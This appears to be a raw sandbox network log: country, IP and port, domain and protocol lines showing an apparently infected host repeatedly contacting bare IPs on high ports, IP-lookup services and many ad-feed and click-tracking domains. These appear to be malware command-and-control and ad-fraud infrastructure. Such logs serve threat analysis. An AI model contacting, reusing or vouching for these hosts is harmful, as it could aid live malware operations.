US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.94.65:443 static.cloudflareinsights.com tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
NL 65.9.83.81:443 m5i6q.app.link tcp
US 8.8.8.8:53 www.loopcloud.com udp
US 104.18.0.59:443 www.loopcloud.com tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 loopmasters.postaffiliatepro.com udp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 bat.bing.com udp
US 204.79.197.200:443 bat.bing.com tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 142.250.102.156:443 stats.g.doubleclick.net tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 bat.bing.com udp
US 204.79.197.200:443 bat.bing.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 142.251.36.3:443 www.google.nl tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.loopcloud.com udp
US 104.248.119.102:32795 tcp
US 104.18.0.59:443 www.loopcloud.com tcp
US 8.8.8.8:53 js-agent.newrelic.com udp
US 151.101.2.137:443 js-agent.newrelic.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 bam-cell.nr-data.net udp
US 162.247.243.146:443 bam-cell.nr-data.net tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 8.8.8.8:53 www.directdexchange.com udp
US 8.8.8.8:53 fernandomayol.com udp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:80 www.directdexchange.com tcp
KR 183.78.205.92:80 fernandomayol.com tcp
US 192.241.154.41:18183 tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 112.t.keepitpumpin.io udp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
US 134.209.213.232:16228 tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
UA 77.123.139.190:443 api.2ip.ua tcp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
US 104.248.231.233:50796 tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 tps614.doubleverify.com udp
US 204.154.111.105:443 tps614.doubleverify.com tcp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 104.248.231.233:50796 tcp
US 192.241.154.41:18183 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 172.67.75.172:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 translate.googleapis.com udp
NL 142.250.179.138:443 translate.googleapis.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
VN 103.63.108.18:443 searchengineads.net tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 feed.lookbox.net udp
US 172.67.164.57:443 feed.lookbox.net tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 apis.google.com udp
US 104.248.231.233:50796 tcp
NL 142.250.179.142:443 apis.google.com tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 searchada.com udp
US 3.234.28.191:443 searchada.com tcp
US 8.8.8.8:53 searchada.com udp
US 192.241.154.41:18183 tcp
US 3.234.28.191:443 searchada.com tcp
US 104.26.12.31:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 google.com udp
US 142.251.36.46:443 google.com tcp
US 8.8.8.8:53 google.com udp
US 104.248.231.233:50796 tcp
US 142.251.36.46:443 google.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 172.217.168.234:443 content-autofill.googleapis.com tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 translate.googleapis.com udp
NL 142.250.179.138:443 translate.googleapis.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
VN 103.63.108.18:443 searchengineads.net tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 feed.lookbox.net udp
US 104.21.15.206:443 feed.lookbox.net tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 feed.lookbox.net udp
US 104.21.15.206:443 feed.lookbox.net tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 apis.google.com udp
US 104.248.231.233:50796 tcp
NL 142.250.179.142:443 apis.google.com tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 searchada.com udp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 searchada.com udp
US 3.234.28.191:443 searchada.com tcp
US 3.234.28.191:443 searchada.com tcp
US 8.8.8.8:53 searchada.com udp
US 8.8.8.8:53 searchada.com udp
US 3.234.28.191:443 searchada.com tcp
US 3.234.28.191:443 searchada.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 google.com udp
US 142.251.36.46:443 google.com tcp
US 104.248.231.233:50796 tcp
US 104.248.231.233:50796 tcp
US 192.241.154.41:18183 tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 142.251.36.46:443 google.com tcp
US 142.251.36.46:443 google.com tcp
US 104.26.12.31:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 104.248.231.233:50796 tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
US 8.8.8.8:53 110.t.keepitpumpin.io udp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 192.241.154.41:18183 tcp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 api.2ip.ua udp
UA 77.123.139.190:443 api.2ip.ua tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
US 134.209.213.160:33869 tcp
US 8.8.8.8:53 112.t.keepitpumpin.io udp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 check.labaz.vip tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 69.195.128.18:80 checkipo.labaz.vip tcp
US 69.195.128.18:80 check.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 check.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 check.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 69.195.128.18:80 check.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 192.133.142.140:80 192.133.142.140 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.infinity-info.com udp
US 174.137.133.16:80 xml.infinity-info.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 8.8.8.8:53 xml.adokutcontextual.com udp
US 192.133.142.140:80 192.133.142.140 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 174.137.133.19:80 xml.adokutcontextual.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 8.8.8.8:53 filter.infinity-info.com udp
US 174.137.133.16:80 filter.infinity-info.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 8.8.8.8:53 xml.leoyard.com udp
US 198.134.116.18:80 xml.leoyard.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 filter.adokutcontextual.com udp
US 174.137.133.19:80 filter.adokutcontextual.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 8.8.8.8:53 xml.adzestocp.com udp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 174.137.133.18:80 xml.adzestocp.com tcp
US 8.8.8.8:53 xml.leoyard.com udp
US 8.8.8.8:53 srv1.rtb.me udp
US 198.134.116.18:80 xml.leoyard.com tcp
US 209.127.185.211:443 srv1.rtb.me tcp
US 8.8.8.8:53 verifyclicksolutions.com udp
US 192.133.142.140:80 192.133.142.140 tcp
US 67.55.72.126:443 verifyclicksolutions.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 192.133.142.140:80 192.133.142.140 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 192.133.142.140:80 192.133.142.140 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.adokutcontextual.com udp
US 174.137.133.19:80 xml.adokutcontextual.com tcp
US 8.8.8.8:53 rotabol.com udp
US 8.8.8.8:53 verifyclicksolutions.com udp
US 8.8.8.8:53 us.postsupport.net udp
US 38.100.129.136:443 us.postsupport.net tcp
US 67.55.72.126:443 verifyclicksolutions.com tcp
US 162.252.21.18:443 rotabol.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.flairadscpc.com udp
US 174.137.133.18:80 xml.flairadscpc.com tcp
US 192.133.142.140:80 192.133.142.140 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 thereciperepository.com udp
US 66.33.193.202:80 thereciperepository.com tcp
US 8.8.8.8:53 xml.zeusadx.com udp
US 174.137.133.17:80 xml.zeusadx.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.flairadscpc.com udp
US 174.137.133.18:80 xml.flairadscpc.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 192.133.142.140:80 192.133.142.140 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 filter.adokutcontextual.com udp
US 174.137.133.19:80 filter.adokutcontextual.com tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 8.8.8.8:53 filtering.fastsearch.me udp
FR 51.159.93.10:443 filtering.fastsearch.me tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.flairadscpc.com udp
US 8.8.8.8:53 furricity-nursubaru.xyz udp
US 3.225.140.174:443 furricity-nursubaru.xyz tcp
US 174.137.133.18:80 xml.flairadscpc.com tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 filter.showcasepop.com udp
US 174.137.133.17:80 filter.showcasepop.com tcp
US 66.33.193.202:80 thereciperepository.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 216.172.61.20:80 216.172.61.20 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 216.172.61.20:80 216.172.61.20 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.leoyard.com udp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 198.134.116.18:80 xml.leoyard.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 8.8.8.8:53 furricity-nursubaru.xyz udp
US 3.225.140.174:443 furricity-nursubaru.xyz tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 goto.riseofthetide.xyz udp
US 198.134.116.30:80 goto.riseofthetide.xyz tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 rotabol.com udp
US 8.8.8.8:53 xml.showcasepop.com udp
US 174.137.133.17:80 xml.showcasepop.com tcp
US 8.8.8.8:53 www.wsear.ch udp
US 162.252.21.18:443 rotabol.com tcp
NL 216.58.208.104:80 www.googletagmanager.com tcp
US 8.8.8.8:53 ortrun-adi.com udp
NL 216.58.208.104:80 www.googletagmanager.com tcp
US 142.251.36.14:80 www.google-analytics.com tcp
US 34.195.129.193:443 ortrun-adi.com tcp
US 18.205.36.100:443 www.wsear.ch tcp
NL 216.58.208.104:80 www.googletagmanager.com tcp
US 8.8.8.8:53 xml.boffoadsfeeds.com udp
US 8.8.8.8:53 tracking.wpnetwork.eu udp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 174.137.133.18:80 xml.boffoadsfeeds.com tcp
US 104.17.40.62:443 tracking.wpnetwork.eu tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 verifyclicksolutions.com udp
US 67.55.72.126:443 verifyclicksolutions.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 thereciperepository.com udp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 66.33.193.202:80 thereciperepository.com tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 srv4.rtb.me udp
US 209.127.187.251:443 srv4.rtb.me tcp
US 216.172.61.20:80 216.172.61.20 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 8.8.8.8:53 filter.boffoadsfeeds.com udp
US 104.192.170.110:80 own6.labaz.vip tcp
US 8.8.8.8:53 f.frequentvisitor.com udp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 174.137.133.18:80 filter.boffoadsfeeds.com tcp
US 54.176.90.230:443 f.frequentvisitor.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 8.8.8.8:53 t.searchenhancements.com udp
US 104.21.7.23:443 t.searchenhancements.com tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 ajax.googleapis.com udp
NL 142.250.179.202:443 ajax.googleapis.com tcp
US 8.8.8.8:53 tag.simpli.fi udp
NL 169.50.137.176:443 tag.simpli.fi tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 stackpath.bootstrapcdn.com udp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
US 8.8.8.8:53 www.americascardroom.eu udp
US 104.16.210.45:443 www.americascardroom.eu tcp
US 8.8.8.8:53 www.americascardroom.eu udp
US 104.16.210.45:443 www.americascardroom.eu tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 104.192.170.110:80 tcp
US 8.8.8.8:53 xml.pinacaads.com udp
US 174.137.133.17:80 xml.pinacaads.com tcp
US 8.8.8.8:53 xml.zeusadx.com udp
US 174.137.133.17:80 xml.zeusadx.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 filtering.fastsearch.me udp
US 8.8.8.8:53 ds1.dvtps.com udp
FR 51.159.93.10:443 filtering.fastsearch.me tcp
US 204.154.110.42:80 ds1.dvtps.com tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 104.192.170.110:80 tcp
US 8.8.8.8:53 tracking.wpnetwork.eu udp
US 8.8.8.8:53 verifyclicksolutions.com udp
US 104.17.39.62:443 tracking.wpnetwork.eu tcp
US 67.55.72.126:443 verifyclicksolutions.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
IN 139.59.89.245:31373 tcp
US 174.137.133.17:80 xml.zeusadx.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 cdn.doubleverify.com udp
NL 104.123.45.213:80 cdn.doubleverify.com tcp
US 8.8.8.8:53 xml.leoyard.com udp
US 198.134.116.18:80 xml.leoyard.com tcp
US 8.8.8.8:53 xml.hueadsxml.com udp
US 8.8.8.8:53 www.americascardroom.eu udp
US 8.8.8.8:53 desall.proinder.com udp
US 192.64.119.195:80 desall.proinder.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.16.210.45:443 www.americascardroom.eu tcp
US 198.134.116.16:80 xml.hueadsxml.com tcp
US 104.192.170.110:80 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 104.192.170.110:80 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 8.8.8.8:53 u-12881.onetouch7.info udp
US 104.21.1.66:80 u-12881.onetouch7.info tcp
US 8.8.8.8:53 xml.adokutcontextual.com udp
US 174.137.133.19:80 xml.adokutcontextual.com tcp
US 8.8.8.8:53 ul1.dvtps.com udp
DE 213.254.244.15:80 ul1.dvtps.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 t.searchenhancements.com udp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 lifetravel.media udp
US 8.8.8.8:53 www.americascardroom.eu udp
US 192.133.142.140:80 192.133.142.140 tcp
US 8.8.8.8:53 r-us.tsyndicate.com udp
US 8.8.8.8:53 filter.adokutcontextual.com udp
US 216.172.61.20:80 216.172.61.20 tcp
US 8.8.8.8:53 filter.flairadscpc.com udp
US 66.242.14.26:443 r-us.tsyndicate.com tcp
US 8.8.8.8:53 xml.thenetwork18.com udp
US 8.8.8.8:53 dev.visualwebsiteoptimizer.com udp
US 104.21.7.23:443 t.searchenhancements.com tcp
DE 94.130.134.171:443 lifetravel.media tcp
US 174.137.133.17:80 xml.thenetwork18.com tcp
US 174.137.133.19:80 filter.adokutcontextual.com tcp
US 174.137.133.18:80 filter.flairadscpc.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 xml.admeridianads.com udp
US 18.205.36.100:443 www.wsear.ch tcp
US 104.192.170.110:80 own6.labaz.vip tcp
US 104.192.169.138:80 tcp
US 104.192.170.110:80 tcp
US 104.16.210.45:443 www.americascardroom.eu tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 8.8.8.8:53 lptag.liveperson.net udp
US 173.239.53.16:80 xml.admeridianads.com tcp
US 174.137.133.16:80 filter.infinity-info.com tcp
GB 178.249.97.23:443 lptag.liveperson.net tcp
US 8.8.8.8:53 static.hotjar.com udp
NL 65.9.83.99:443 static.hotjar.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
